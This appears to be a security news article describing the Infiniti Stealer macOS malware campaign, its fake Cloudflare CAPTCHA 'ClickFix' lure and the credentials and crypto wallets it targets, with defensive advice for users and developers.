Security researchers at GoPlus Security have identified a sophisticated malware campaign dubbed Infiniti Stealer, which specifically targets macOS users within the cryptocurrency and developer communities. The attack utilizes a deceptive "ClickFix" strategy, involving fraudulent Cloudflare CAPTCHA pages that trick victims into manually executing malicious scripts. This campaign represents a growing trend of social engineering tactics designed to bypass traditional browser security measures to exfiltrate encrypted digital assets.
Mechanism of the ClickFix Attack
The infection process begins when a user encounters a fake verification page, often masquerading as a standard Cloudflare security check. The site prompts the user to "fix" a supposed browser error by copying a command and pasting it into the macOS Terminal. Once executed, the initial script performs the following actions:
- Exploits system utilities to remove macOS quarantine attributes, allowing unsigned code to run.
- Writes a second-stage payload to the /tmp directory to minimize its footprint.
- Initiates a background process that remains invisible to the casual user.
By persuading the user to manually input commands, the attackers successfully bypass Gatekeeper and other built-in macOS security protocols that would typically block unauthorized software.
Advanced Payload and Data Exfiltration
The final stage of the Infiniti Stealer is a Python-based Trojan compiled with Nuitka, a tool that converts Python scripts into C++ executables to enhance obfuscation and evade signature-based detection. This malware is specifically programmed to harvest high-value data, including:
- Encrypted Wallets: Sensitive files related to various cryptocurrency wallet applications.
- Keychain Data: Credentials stored within the native macOS Keychain system.
- Browser Data: Saved passwords and cookies from Chromium and Firefox browsers.
- Developer Assets: Sensitive .env files that often contain API keys and private environment variables.
To maintain persistence, the malware includes sandbox detection capabilities to identify if it is being analyzed by security researchers and employs delayed execution to avoid triggering immediate behavioral alerts.
Security Recommendations for Asset Protection
The emergence of Infiniti Stealer highlights a shift in the threat landscape where Mac encrypted assets are increasingly under fire. GoPlus Security emphasizes that users should never copy and paste unknown commands into their terminal, regardless of how legitimate the source website appears.
Users are advised to remain vigilant against social engineering tactics that request manual terminal input. Maintaining updated security software and utilizing hardware wallets for significant cryptocurrency holdings can provide essential layers of defense against such stealthy exfiltration attempts.
As of March 30, 2026, security experts recommend that individuals who may have interacted with suspicious CAPTCHA prompts should immediately audit their macOS Keychain and rotate keys for any potentially compromised development environments.
Frequently Asked Questions
Quick answers to the most common questions about this topic.
For educational purposes only. Nothing here constitutes financial or investment advice. Crypto markets are highly volatile — always DYOR before making any decisions.
Fact-checked per our editorial policy. We maintain strict independence from advertisers. Spot an error? Let us know.